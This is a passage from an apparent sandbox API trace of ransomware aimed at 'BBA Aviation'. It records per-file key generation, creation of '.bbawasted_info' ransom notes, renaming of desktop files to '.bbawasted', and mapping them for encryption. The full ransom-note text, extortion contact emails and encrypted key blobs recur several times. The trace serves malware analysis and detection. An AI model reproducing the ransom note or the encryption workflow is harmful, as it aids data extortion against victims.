phProv=0x12ffb24*=0x6a6b48) returned 1 [0205.116] CryptGenRandom (in: hProv=0x6a6b48, dwLen=0x200, pbBuffer=0x12ffb40 | out: pbBuffer=0x12ffb40) returned 1 [0205.116] CryptReleaseContext (hProv=0x6a6b48, dwFlags=0x0) returned 1 [0205.268] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x403) returned 0x6be308 [0205.268] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6ae598 | out: hHeap=0x660000) returned 1 [0205.268] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bb6f0 [0205.268] _snwprintf (in: _Dest=0x6bb6f0, _Count=0x51d, _Format="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]jAlgfbUYSW+mw0I478lJCHoxN95Em5oMpc/r7UGgVEUM2Zmjx5PtM6QtJSgqgZfT\r\nEqCR6QX6xYFPEayARwc+xwDocGqFZlPzadnkUU9NIxiy/N1tWhjNKCuXsZVk+xcx\r\n7zkmf0XDkIfrPOz5W0/sD75n6jzFybADBeT468ESvtHxde/gwUcqwvW6YjgHF59k\r\nDTtlpfgylAXdn9ShFqldOTtl/G/Wl6JNNCJkeGTFgKQM/xGqontwdCGu/Vy6StuV\r\nAlMgj+zNdICko7O4WgSEZVjhqmA0f6HBbDH2MTybGndytWCcDLf0x/uJnVMtxHSO\r\nLUuYo1EJVh0g6LOscFajbMjtgDKHBDEN9uMkg422aZRPOpSjFpSO1YViWwKj+nIJ\r\nRyMjulNW61GA0n6DFkaXP4gWi5rYt0LEKpFM+ARIImiWo379N/QTiVDqQHkcpI2P\r\nyTf3Zc5fD4fnNJ/FCZ46/IuL0VELFq+9hwNyk6bFnwdSYFovc3aCay47BqwFB+wi\r\nqVy3T1d+5vWySCkQbRHN3oxz2g5D8aaXrVMqkYNUCPwfumtwKEJgNojgmUwbKB5m\r\n1ikGUjEa/zp8vYgHDBIIYmwp5BixJ3bq2jc9CSOlIkJkdzMo36rS3SZZV/nbY5+r\r\nopG53tQmcrq2+JBOmsnBaVSLvOR7fU7Bhs/+Cb7AYED=[end_key]\r\nKEEP IT\r\n") returned 984 [0205.268] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6be308 | out: hHeap=0x660000) returned 1 [0205.268] WriteFile (in: hFile=0x280, lpBuffer=0x6bb6f0*, nNumberOfBytesToWrite=0x7b0, lpNumberOfBytesWritten=0x12ffe30, lpOverlapped=0x0 | out: lpBuffer=0x6bb6f0*, lpNumberOfBytesWritten=0x12ffe30*=0x7b0, lpOverlapped=0x0) returned 1 [0205.268] SetEndOfFile (hFile=0x280) returned 1 [0205.271] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bb6f0 | out: hHeap=0x660000) returned 1 [0205.271] CloseHandle (hObject=0x280) returned 1 [0205.280] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6c4b88 | out: hHeap=0x660000) returned 1 [0205.280] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6aa578 | out: hHeap=0x660000) returned 1 [0205.280] CryptAcquireContextW (in: phProv=0x12ffe04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffe04*=0x6a6928) returned 1 [0205.281] CryptGenRandom (in: hProv=0x6a6928, dwLen=0x48, pbBuffer=0x12ffe40 | out: pbBuffer=0x12ffe40) returned 1 [0205.281] CryptReleaseContext (hProv=0x6a6928, dwFlags=0x0) returned 1 [0205.281] lstrlenW (lpString="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\8T-T9rK0.m4a") returned 40 [0205.281] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x25a) returned 0x6adb18 [0205.281] lstrcpyW (in: lpString1=0x6adb68, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0205.282] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bb6f0 [0205.282] CryptAcquireContextW (in: phProv=0x12ffde0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffde0*=0x6a6790) returned 1 [0205.282] CryptGenRandom (in: hProv=0x6a6790, dwLen=0xa3a, pbBuffer=0x6bb6f0 | out: pbBuffer=0x6bb6f0) returned 1 [0205.282] CryptReleaseContext (hProv=0x6a6790, dwFlags=0x0) returned 1 [0205.282] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\8T-T9rK0.m4a.bbawasted_info" (normalized: "c:\\users\\fd1hvy\\desktop\\8t-t9rk0.m4a.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x280 [0205.283] WriteFile (in: hFile=0x280, lpBuffer=0x6bb6f0*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x12ffdfc, lpOverlapped=0x0 | out: lpBuffer=0x6bb6f0*, lpNumberOfBytesWritten=0x12ffdfc*=0xa3a, lpOverlapped=0x0) returned 1 [0205.285] SetEndOfFile (hFile=0x280) returned 1 [0205.285] SetFilePointer (in: hFile=0x280, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0205.285] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bb6f0 | out: hHeap=0x660000) returned 1 [0205.285] lstrcpyW (in: lpString1=0x6adb68, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0205.285] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\8T-T9rK0.m4a" (normalized: "c:\\users\\fd1hvy\\desktop\\8t-t9rk0.m4a"), lpNewFileName="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\8T-T9rK0.m4a.bbawasted" (normalized: "c:\\users\\fd1hvy\\desktop\\8t-t9rk0.m4a.bbawasted")) returned 1 [0205.286] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\8T-T9rK0.m4a.bbawasted" (normalized: "c:\\users\\fd1hvy\\desktop\\8t-t9rk0.m4a.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x288 [0205.287] CreateFileMappingW (hFile=0x288, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x290 [0205.287] GetFileSize (in: hFile=0x288, lpFileSizeHigh=0x12ffdcc | out: lpFileSizeHigh=0x12ffdcc*=0x0) returned 0x59f9 [0205.287] MapViewOfFile (hFileMappingObject=0x290, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x59f9) returned 0x640000 [0205.287] CloseHandle (hObject=0x288) returned 1 [0205.291] UnmapViewOfFile (lpBaseAddress=0x640000) returned 1 [0205.291] CloseHandle (hObject=0x290) returned 1 [0205.291] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x200) returned 0x6ae598 [0205.291] CryptAcquireContextW (in: phProv=0x12ffdbc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffdbc*=0x6a61b8) returned 1 [0205.292] CryptGenRandom (in: hProv=0x6a61b8, dwLen=0x1b8, pbBuffer=0x6ae5e0 | out: pbBuffer=0x6ae5e0) returned 1 [0205.292] CryptReleaseContext (hProv=0x6a61b8, dwFlags=0x0) returned 1 [0205.292] CryptAcquireContextW (in: phProv=0x12ffb24, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffb24*=0x6a6c58) returned 1 [0205.293] CryptGenRandom (in: hProv=0x6a6c58, dwLen=0x200, pbBuffer=0x12ffb40 | out: pbBuffer=0x12ffb40) returned 1 [0205.293] CryptReleaseContext (hProv=0x6a6c58, dwFlags=0x0) returned 1 [0205.304] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x403) returned 0x6c4b88 [0205.304] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6ae598 | out: hHeap=0x660000) returned 1 [0205.304] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bb6f0 [0205.304] _snwprintf (in: _Dest=0x6bb6f0, _Count=0x51d, _Format="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]pjyjmr65yZURzUpv96jahE5z5nWICrJ5dBXOptr3AoqOPBgVKXSHdBYVA6nYvQS1\r\nn6KaDbnT+wesF1lJyZ/ByfzAeytWLfEQkSqoEASJL1751waK8hjIscNzyO+joCes\r\nNAxfF6v4GmkoMe/aUfSqGYTR3ypdSyG/3yMhfQMrfTL8/US1w5+bE+zYhy9VZ4hp\r\nh+CZSC9EsBAwzdzV57e6bBFTotzZcsyRnqEx9wP4GDlam43O9NAsNIMifeac2AwY\r\ninBi2B43dgk5i8wGBZSpLvKvWKY6CL/5Vfz3xXbt5SnOYWHaURVyy2v+xDGhlEI6\r\nBXkcCgL18O9a7JhfJlSo7gMgGtmorfrqgMsBdcnxNTP0Bw0DDsMQWXCC70W1Msk9\r\nKSbKQH/D9S/Jt6eVFz+E+Kz0zSbfAj6j84+VcaJMwL4vK6xwLo9NITIJq/YW1wna\r\nTTlMuVVPBe8/D5/R7U1DHTkKaQvHYGDGER/RKZEvy6bxcNzV6M5BpI498YhD5Bfs\r\nuheA9LMdLizpY85BDnMIp4SJO80Pp0ZD+O98jxirG9aoBszNimb8MQrvPhdxKz2x\r\nr/In0/H5reCtrJorOeUK3za6uh7eF47Q8S+WWcMZf8MZBMhiSQnYX7WDsUsqSung\r\nbLfzQIbtwp/4et+qYLFxDX78yufUCQ6b5s+qA+xuL/x=[end_key]\r\nKEEP IT\r\n") returned 984 [0205.304] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6c4b88 | out: hHeap=0x660000) returned 1 [0205.304] WriteFile (in: hFile=0x280, lpBuffer=0x6bb6f0*, nNumberOfBytesToWrite=0x7b0, lpNumberOfBytesWritten=0x12ffe30, lpOverlapped=0x0 | out: lpBuffer=0x6bb6f0*, lpNumberOfBytesWritten=0x12ffe30*=0x7b0, lpOverlapped=0x0) returned 1 [0205.304] SetEndOfFile (hFile=0x280) returned 1 [0205.464] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bb6f0 | out: hHeap=0x660000) returned 1 [0205.465] CloseHandle (hObject=0x280) returned 1 [0205.466] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6adb18 | out: hHeap=0x660000) returned 1 [0205.467] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6a4098 | out: hHeap=0x660000) returned 1 [0205.467] CryptAcquireContextW (in: phProv=0x12ffe04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffe04*=0x6a6bd0) returned 1 [0205.468] CryptGenRandom (in: hProv=0x6a6bd0, dwLen=0x48, pbBuffer=0x12ffe40 | out: pbBuffer=0x12ffe40) returned 1 [0205.468] CryptReleaseContext (hProv=0x6a6bd0, dwFlags=0x0) returned 1 [0205.468] lstrlenW (lpString="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\AVOpHcf3wm02xwY6.jpg") returned 48 [0205.468] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x26a) returned 0x6adb18 [0205.468] lstrcpyW (in: lpString1=0x6adb78, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0205.468] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bb6f0 [0205.468] CryptAcquireContextW (in: phProv=0x12ffde0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffde0*=0x6a6bd0) returned 1 [0205.469] CryptGenRandom (in: hProv=0x6a6bd0, dwLen=0xa3a, pbBuffer=0x6bb6f0 | out: pbBuffer=0x6bb6f0) returned 1 [0205.469] CryptReleaseContext (hProv=0x6a6bd0, dwFlags=0x0) returned 1 [0205.469] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\AVOpHcf3wm02xwY6.jpg.bbawasted_info" (normalized: "c:\\users\\fd1hvy\\desktop\\avophcf3wm02xwy6.jpg.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x280 [0205.469] WriteFile (in: hFile=0x280, lpBuffer=0x6bb6f0*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x12ffdfc, lpOverlapped=0x0 | out: lpBuffer=0x6bb6f0*, lpNumberOfBytesWritten=0x12ffdfc*=0xa3a, lpOverlapped=0x0) returned 1 [0205.471] SetEndOfFile (hFile=0x280) returned 1 [0205.471] SetFilePointer (in: hFile=0x280, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0205.471] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bb6f0 | out: hHeap=0x660000) returned 1 [0205.471] lstrcpyW (in: lpString1=0x6adb78, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0205.471] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\AVOpHcf3wm02xwY6.jpg" (normalized: "c:\\users\\fd1hvy\\desktop\\avophcf3wm02xwy6.jpg"), lpNewFileName="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\AVOpHcf3wm02xwY6.jpg.bbawasted" (normalized: "c:\\users\\fd1hvy\\desktop\\avophcf3wm02xwy6.jpg.bbawasted")) returned 1 [0205.472] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\AVOpHcf3wm02xwY6.jpg.bbawasted" (normalized: "c:\\users\\fd1hvy\\desktop\\avophcf3wm02xwy6.jpg.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x288 [0205.473] CreateFileMappingW (hFile=0x288, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x290 [0205.473] GetFileSize (in: hFile=0x288, lpFileSizeHigh=0x12ffdcc | out: lpFileSizeHigh=0x12ffdcc*=0x0) returned 0x68eb [0205.473] MapViewOfFile (hFileMappingObject=0x290, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x68eb) returned 0x640000 [0205.473] CloseHandle (hObject=0x288) returned 1 [0205.478] UnmapViewOfFile (lpBaseAddress=0x640000) returned 1 [0205.478] CloseHandle (hObject=0x290) returned 1 [0205.478] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x200) returned 0x689df0 [0205.478] CryptAcquireContextW (in: phProv=0x12ffdbc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffdbc*=0x6a6020) returned 1 [0205.479] CryptGenRandom (in: hProv=0x6a6020, dwLen=0x1b8, pbBuffer=0x689e38 | out: pbBuffer=0x689e38) returned 1 [0205.479] CryptReleaseContext (hProv=0x6a6020, dwFlags=0x0) returned 1 [0205.479] CryptAcquireContextW (in: phProv=0x12ffb24, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffb24*=0x6a6680) returned 1 [0205.480] CryptGenRandom (in: hProv=0x6a6680, dwLen=0x200, pbBuffer=0x12ffb40 | out: pbBuffer=0x12ffb40) returned 1 [0205.480] CryptReleaseContext (hProv=0x6a6680, dwFlags=0x0) returned 1 [0205.491] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x403) returned 0x6aecf0 [0205.491] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x689df0 | out: hHeap=0x660000) returned 1 [0205.491] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bb6f0 [0205.491] _snwprintf (in: _Dest=0x6bb6f0, _Count=0x51d, _Format="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]Wz2sz3ifpr+1nrtbNtwukSzxbThottMm/hD7dLHClsK+5oUr3yhW5nNkuKc23/9q\r\nGc47YvYtbIWdRkj5DaeHnQxHgf53fGA2FOR3nqLO0MZQtvedzofYLB/ZYZ+GXXqe\r\nEqV8gOSi4OOBvoNarH/o6H4EOviqH3nzDNN4uqV4gEjJJwIPoi/loEk3DMs1iIZb\r\nccmsSgDD7UXRBllxMCaC9xSdJDbllOyJaiIXYdrY9scxRT8DzaS04O+l+bEorR3e\r\ncf4EeWKllGzeeLyOuD0N99jbkEX15y8F/NiNXe+GX0LjuEzyvF+vrMtPApQj147Q\r\nJHtslCBpRLXHM4yh6RXmoIH87EK9cqtDcseLJaKAuR9vAY43kCnJ8EUI7yvH/KgX\r\nkcn0d7zQc4e1Q7CmIxPNizc8lVwE0Bic6FKsXYSgGttuTnfnfLJLJ/GQE1ib5iSl\r\nkzP2Nv+ewfg6Gf9sludSaNGmdhpzbfc/u3o45tK93eHq6kYf3ei9w9LN90xUHPJi\r\n/crp67KQvoYKT0yCQ2m9KGQWzGiWvWkWIWt916XhQO7z0nQO5utM0Uo1CvBJ8L74\r\nM43bEDGZ3jbHdKIYhbWHerhoemzTDGIpH4vfGA6dNeA40OpbzsLf2dYP94vNQWHu\r\n9r+oMYY4nac2Eg7XfrV96STXyFL4jJb3+vdW3/MLCB4=[end_key]\r\nKEEP IT\r\n") returned 984 [0205.491] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6aecf0 | out: hHeap=0x660000) returned 1 [0205.491] WriteFile (in: hFile=0x280, lpBuffer=0x6bb6f0*, nNumberOfBytesToWrite=0x7b0, lpNumberOfBytesWritten=0x12ffe30, lpOverlapped=0x0 | out: lpBuffer=0x6bb6f0*, lpNumberOfBytesWritten=0x12ffe30*=0x7b0, lpOverlapped=0x0) returned 1 [0205.492] SetEndOfFile (hFile=0x280) returned 1 [0205.494] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bb6f0 | out: hHeap=0x660000) returned 1 [0205.495] CloseHandle (hObject=0x280) returned 1 [0205.500] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6adb18 | out: hHeap=0x660000) returned 1 [0205.500] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6a2438 | out: hHeap=0x660000) returned 1 [0205.500] CryptAcquireContextW (in: phProv=0x12ffe04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffe04*=0x6a6a38) returned 1 [0205.501] CryptGenRandom (in: hProv=0x6a6a38, dwLen=0x48, pbBuffer=0x12ffe40 | out: pbBuffer=0x12ffe40) returned 1 [0205.501] CryptReleaseContext (hProv=0x6a6a38, dwFlags=0x0) returned 1 [0205.501] lstrlenW (lpString="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\Aww2swe22n2.odt") returned 43 [0205.501] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x260) returned 0x6adb18 [0205.501] lstrcpyW (in: lpString1=0x6adb6e, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0205.501] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bb6f0 [0205.502] CryptAcquireContextW (in: phProv=0x12ffde0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffde0*=0x6a6240) returned 1 [0205.502] CryptGenRandom (in: hProv=0x6a6240, dwLen=0xa3a, pbBuffer=0x6bb6f0 | out: pbBuffer=0x6bb6f0) returned 1 [0205.502] CryptReleaseContext (hProv=0x6a6240, dwFlags=0x0) returned 1 [0205.502] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\Aww2swe22n2.odt.bbawasted_info" (normalized: "c:\\users\\fd1hvy\\desktop\\aww2swe22n2.odt.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x280 [0205.503] WriteFile (in: hFile=0x280, lpBuffer=0x6bb6f0*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x12ffdfc, lpOverlapped=0x0 | out: lpBuffer=0x6bb6f0*, lpNumberOfBytesWritten=0x12ffdfc*=0xa3a, lpOverlapped=0x0) returned 1 [0205.505] SetEndOfFile (hFile=0x280) returned 1 [0205.505] SetFilePointer (in: hFile=0x280, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0205.505] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bb6f0 | out: hHeap=0x660000) returned 1 [0205.505] lstrcpyW (in: lpString1=0x6adb6e, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0205.505] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\Aww2swe22n2.odt" (normalized: "c:\\users\\fd1hvy\\desktop\\aww2swe22n2.odt"), lpNewFileName="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\Aww2swe22n2.odt.bbawasted" (normalized: "c:\\users\\fd1hvy\\desktop\\aww2swe22n2.odt.bbawasted")) returned 1 [0205.754] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\Aww2swe22n2.odt.bbawasted" (normalized: "c:\\users\\fd1hvy\\desktop\\aww2swe22n2.odt.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x290 [0205.754] CreateFileMappingW (hFile=0x290, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x294 [0205.755] GetFileSize (in: hFile=0x290, lpFileSizeHigh=0x12ffdcc | out: lpFileSizeHigh=0x12ffdcc*=0x0) returned 0x103ee [0205.755] MapViewOfFile (hFileMappingObject=0x294, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x103ee) returned 0x640000 [0205.755] CloseHandle (hObject=0x290) returned 1 [0205.761] UnmapViewOfFile (lpBaseAddress=0x640000) returned 1 [0205.762] CloseHandle (hObject=0x294) returned 1 [0205.762] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x200) returned 0x689df0 [0205.762] CryptAcquireContextW (in: phProv=0x12ffdbc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffdbc*=0x6a6708) returned 1 [0205.762] CryptGenRandom (in: hProv=0x6a6708, dwLen=0x1b8, pbBuffer=0x689e38 | out: pbBuffer=0x689e38) returned 1 [0205.762] CryptReleaseContext (hProv=0x6a6708, dwFlags=0x0) returned 1 [0205.763] CryptAcquireContextW (in: phProv=0x12ffb24, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffb24*=0x6a68a0) returned 1 [0205.763] CryptGenRandom (in: hProv=0x6a68a0, dwLen=0x200, pbBuffer=0x12ffb40 | out: pbBuffer=0x12ffb40) returned 1 [0205.763] CryptReleaseContext (hProv=0x6a68a0, dwFlags=0x0) returned 1 [0205.773] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x403) returned 0x6aecf0 [0205.773] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x689df0 | out: hHeap=0x660000) returned 1 [0205.773] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bb6f0 [0205.773] _snwprintf (in: _Dest=0x6bb6f0, _Count=0x51d, _Format="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]XEChiIv7fqabazFV7GSnpu4ANCnLpfoW+fp2mggPEW2BW37VuMmWEpFpeF6MKg5g\r\n6qMeFgq4FihYM2Rjh1//SwsJGgj+eh7hdc1fJ48+0Olu5A0AyETMH4qxLgDO/U/r\r\nBmW5cySIrJLg5+0ti7X4Mp6c8lhzP05YQz/EBAcEkvygiL3PUsrmHqYzbWLfaq7m\r\n6KmCRDE8T06pDqxyTnG5CfIfZzWy2tKAH4j0hkBAiPerfCQYZ0azaPR+YsNxV1RH\r\nrW54j+5pd/kNJ7DCJ4WZ3eXd9ekuVCwQh1OS6tON9LwfocWn7fE3yLuRQHLEcJiJ\r\n103SiT23N+P8sbuMstN5NP6NBDeEyUnYsEHPEzHznQ2sbZy2dyNoZeGGFSUc/IKG\r\nv2ms1xKDnTfvbej7b+bUz9wOSzXIs8511EfjIXwyGcsLhTIML34XU7Ulq8wDqhUO\r\nMwirBlFNUIr12pHUCGOxyvejdFgoSrAvJmHjmO/slHaZHNXcFvGoMzV0YCXLLLfT\r\n2HO4m1YsHqEshKeUAyJH93rlNm0kBTDJJZp6cai4OJnuOnl9ugyjrBep85IH9f6V\r\nQErfS18dRTC/r54xNSTyQU48uSjX7JX89wjfvrCyQN+wMIKdL3PZaqKdmTc8rsuS\r\nOqxmslEG2FavBmHu6Uqf2eTT4iFy+MZzD7Nol44srK8=[end_key]\r\nKEEP IT\r\n") returned 984 [0205.773] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6aecf0 | out: hHeap=0x660000) returned 1 [0205.774] WriteFile (in: hFile=0x280, 